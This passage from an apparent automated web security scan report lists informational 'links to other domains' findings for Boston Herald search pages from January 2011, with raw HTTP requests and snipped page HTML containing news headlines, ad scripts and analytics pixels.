<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DHillary&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312654&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8b9fd5_russia012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312548&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312546&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/international/general/view.bg?articleid=1312700&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/international/general/view.bg?articleid=1312700">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312274&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/38a71e_gov_01272011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312257&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312257">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/9b9186_clinto.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/us_politics/view.bg?articleid=1312155&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/cd18d1_012611budgetpw008.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312180&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312180">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/9162c9_Snow_01272011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312048&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110125/stp/777e92_Deval_08012010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312045&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/8829cb_Obama_01262011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/columnists/view.bg?articleid=1312008&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110126/stp/6f4abd_egypt.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<a id="trackMainImage_href" href="/news/international/general/view.bg?articleid=1312700">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/de6466_Obama_01292011.jpg" title="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House." alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
title="President Obama tells Mubarak: Must take &lsquo;concrete steps"
onclick="switchPhoto('198235');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198235" src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" title="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
itics/view.bg?articleid=1312665" title="Speaker DeLeo shakes up House"
onclick="switchPhoto('198223');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198223" src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
654" title="Mitt Romney &lsquo;catches up&rsquo; with Boston GOP pols"
onclick="switchPhoto('198222');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198222" src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" title="Mitt Romney is seen in this April 23, 2009 file photo in Boston."
alt="Mark Garfinkel" style="margin:0 2px" />

</a>
...[SNIP]...
12606" title="Dmitry Medvedev signs ratification of nuke pact with US"
onclick="switchPhoto('198177');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198177" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8b9fd5_russia012811.jpg" title="Russian President Dmitry Medvedev gestures as he heads a meeting on economic issues at the Gorki presidential residence outside Moscow on Friday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
2257" title="Gov. Deval Patrick&rsquo;s &lsquo;painful&rsquo; choices"
onclick="switchPhoto('197920');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197920" src="http://multimedia.heraldinteractive.com/images/20110126/stp/38a71e_gov_01272011.jpg" title="ON THE CHOPPING BLOCK: Gov. Deval Patrick, right, answers questions about his &#36;30.5B budget as Lt. Gov. Tim Murray looks on at the State House."
alt="Patrick Whittemore" style="margin:0 2px" />

</a>
...[SNIP]...
cleid=1312180" title="Gov. Patrick cuts 900 jobs in bare-bones budget"
onclick="switchPhoto('197875');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197875" src="http://multimedia.heraldinteractive.com/images/20110126/stp/cd18d1_012611budgetpw008.jpg" title="Gov. Deval Patrick responds to questions today at the Statehouse during a press conference on the 2012 budget. "
alt="Patrick Whittemore" style="margin:0 2px" />

</a>
...[SNIP]...
155" title="Hillary Rodham Clinton calls for calm, restraint in Egypt"
onclick="switchPhoto('197855');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197855" src="http://multimedia.heraldinteractive.com/images/20110126/stp/9b9186_clinto.jpg" title="U.S. Secretary of State Hillary Rodham Clinton"
alt="AP (file)" style="margin:0 2px" />

</a>
...[SNIP]...
312048" title="Mother Nature may give state workers another free pass"
onclick="switchPhoto('197745');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197745" src="http://multimedia.heraldinteractive.com/images/20110125/stp/9162c9_Snow_01272011.jpg" title="WINTER BLUES: John Thompson of Burlington snaps a photo of the snow-covered park. "
alt="Patrick Whittemore" style="margin:0 2px" />

</a>
...[SNIP]...
Gov. Deval Patrick bid to combine Parole, Probation agencies rebuffed"
onclick="switchPhoto('197744');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197744" src="http://multimedia.heraldinteractive.com/images/20110125/stp/777e92_Deval_08012010.jpg" title="Gov. Deval Patrick "
alt="Herald file" style="margin:0 2px" />

</a>
...[SNIP]...
cleid=1312008" title="State of the Union rests in Obama&rsquo;s hands"
onclick="switchPhoto('197748');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197748" src="http://multimedia.heraldinteractive.com/images/20110126/stp/8829cb_Obama_01262011.jpg" title="&#x2018;WE WILL MOVE FORWARD TOGETHER&#x2019;: President Obama gestures while delivering his State of the Union address on Capitol Hill last night."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
cleid=1311992" title="Officials say 2 killed in new protests in Cairo"
onclick="switchPhoto('197840');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197840" src="http://multimedia.heraldinteractive.com/images/20110126/stp/6f4abd_egypt.jpg" title="Protesters stop traffic in the middle of a bridge over the Nile river during clashes in downtown Cairo, Egypt, in the early hours of Wednesday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
icleid=1311892" title="Egyptian protesters denounce Mubarak; 3 killed"
onclick="switchPhoto('197661');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197661" src="http://multimedia.heraldinteractive.com/images/20110125/stp/126069_ltpCairoprotest012511.jpg" title="Protesters are confronted by riot police as they demonstrate in downtown Cairo, Egypt Tuesday, Jan. 25, 2011."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
ticleid=1311847" title="List of 83rd annual Academy Award nominations"
onclick="switchPhoto('197712');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197712" src="http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg" title="Christian Bale and Mark Wahlberg, right, appear in &#x201C;The Fighter.&#x201D; The Lowell-based flick was nominated for 7 Academy Awards, including best picture, and Bale for best supporting actor. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
11726" title="Clinton supports Mexico in &rsquo;messy&rsquo; drug war"
onclick="switchPhoto('197562');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197562" src="http://multimedia.heraldinteractive.com/images/20110124/stp/cdad85_mexi_01252011.jpg" title="Secretary of State Hillary Rodham Clinton speaks to reporters at a press conference in Guanajuato, Mexico."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
ticleid=1311638" title="Tunisian protest tear-gassed, teachers strike"
onclick="switchPhoto('197509');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197509" src="http://multimedia.heraldinteractive.com/images/20110124/stp/066488_tunis.jpg" title="Schoolchildren wait outside their school in Tunis, Monday."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
eid=1311414" title="WikiLeaks: 1 percent of diplomatic docs published"
onclick="switchPhoto('197359');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197359" src="http://multimedia.heraldinteractive.com/images/20110123/stp/c358d0_wiki.jpg" title=" In this Wednesday, Dec. 8, 2010 file photo, Claes Borgstrom, lawyer for the two women who claim to have been sexually assaulted by WikiLeaks founder Julian Assange in Sweden in August, talks to media at his office in Stockholm."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
d=1310972" title="Therese Murray rips gov&rsquo;s rush to give grants"
onclick="switchPhoto('197040');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197040" src="http://multimedia.heraldinteractive.com/images/20110120/stp/3014c4_murray_01212011.jpg" title="TOUGH TALK: Senate President Therese Murray yesterday criticized Gov. Deval Patrick&#x2019;s
handling of the grants for Evergreen Solar Inc."
alt="Ted Fitzgerald" style="margin:0 2px" />

</a>
...[SNIP]...
eneral/view.bg?articleid=1310517" title="Gov to retire double dipping"
onclick="switchPhoto('196803');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196803" src="http://multimedia.heraldinteractive.com/images/20110119/stp/7f1cf0_deval_01192011.jpg" title="RETIREMENT REFORM: Gov. Patrick speaks at a press
conference that outlined his administration&#x2019;s pension reform and benefits modernization proposal."
alt="Patrick Whittemore" style="margin:0 2px" />

</a>
...[SNIP]...
ws/politics/view.bg?articleid=1310465" title="Evergreen Solar eclipse"
onclick="switchPhoto('196799');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196799" src="http://multimedia.heraldinteractive.com/images/20110118/stp/8dc015_Deval_01192011.jpg" title="FRANK EXCHANGE: Gov. Deval Patrick speaks with Jay Gonzalez, secretary of the Executive Office for Administration and Finance, following a press conference at the State House yesterday that outlined the governor&#x2019;s pension reform plan."
alt="Patrick Whittemore" style="margin:0 2px" />

</a>
...[SNIP]...
olitics/view.bg?articleid=1310296" title="Speaker plots probation fix"
onclick="switchPhoto('196689');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196689" src="http://multimedia.heraldinteractive.com/images/20110118/stp/595066_ltp011711deleoce004.jpg" title="House Speaker Robert DeLeo "
alt="Christopher Evans" style="margin:0 2px" />

</a>
...[SNIP]...
rticleid=1310268" title="Evergreen&rsquo;s flight riles top officials"
onclick="switchPhoto('196734');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196734" src="http://multimedia.heraldinteractive.com/images/20110118/stp/b37f2d_ltpDeleoB011811.jpg" title="LOOKING FOR REFORM: House Speaker Robert DeLeo says the first step in reforming the Probation Department is by putting it under civil-service system rules."
alt="Christopher Evans" style="margin:0 2px" />

</a>
...[SNIP]...
articleid=1310258" title="Brown bucks &lsquo;itty-bitty letter&rsquo;"
onclick="switchPhoto('196662');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196662" src="http://multimedia.heraldinteractive.com/images/20110117/stp/ed8979_ltp0e3e20_brow.jpg" title="Senator Scott Brown speaks yesterday at the 41st Annual Martin Luther King, Jr. Memorial Breakfast at the Boston Convention Center. "
alt="Ted Fitzgerald" style="margin:0 2px" />

</a>
...[SNIP]...
0165" title="Obama to honor China&rsquo;s president with state dinner"
onclick="switchPhoto('196605');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196605" src="http://multimedia.heraldinteractive.com/images/20110117/stp/13b9ac_jint.jpg" title=" In this Nov. 11, 2010, file photo China&rsquo;s President Hu Jintao waves upon arrival at the Seoul Military Airport to attend the G-20 Summit in Seoul, South Korea."
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
" title="Sen. Brown: Forget &lsquo;itty-bitty&rsquo; R at end of name"
onclick="switchPhoto('196555');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196555" src="http://multimedia.heraldinteractive.com/images/20110117/stp/0e3e20_brow.jpg" title=" Senator Scott Brown spoke this morning at the 41st Annual Martin Luther King, Jr. Memorial Breakfast at the Boston Convention Center."
alt="Ted Fitzgerald " style="margin:0 2px" />

</a>
...[SNIP]...
leid=1309873" title="US pomp meant to improve tone of China relations"
onclick="switchPhoto('196320');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196320" src="http://multimedia.heraldinteractive.com/images/20110116/stp/b627cb_jint.jpg" title=" In this Jan. 10, 2011 file photo, Chinese President Hu Jintao delivers a speech at a plenary session of the Communist Party of China Central Commission for Discipline Inspection in Beijing. "
alt="AP" style="margin:0 2px" />

</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.296. http://www.bostonherald.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /search/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /search/?topic=Rep.+James+Vallee&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:05:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DRep.%2BJames%2BVallee%26srvc%3Dhome%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665&format=comments">
...[SNIP]...
</a>&nbsp;&nbsp;

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665">
...[SNIP]...
<a id="trackMainImage_href" href="/news/politics/view.bg?articleid=1312665">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo." alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo.">
</a>
...[SNIP]...
itics/view.bg?articleid=1312665" title="Speaker DeLeo shakes up House"
onclick="switchPhoto('198223');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198223" src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."
alt="Nancy Lane" style="margin:0 2px" />

</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.297. http://www.bostonherald.com/search/

Summary

Severity:   Information
Confidence:   Certain
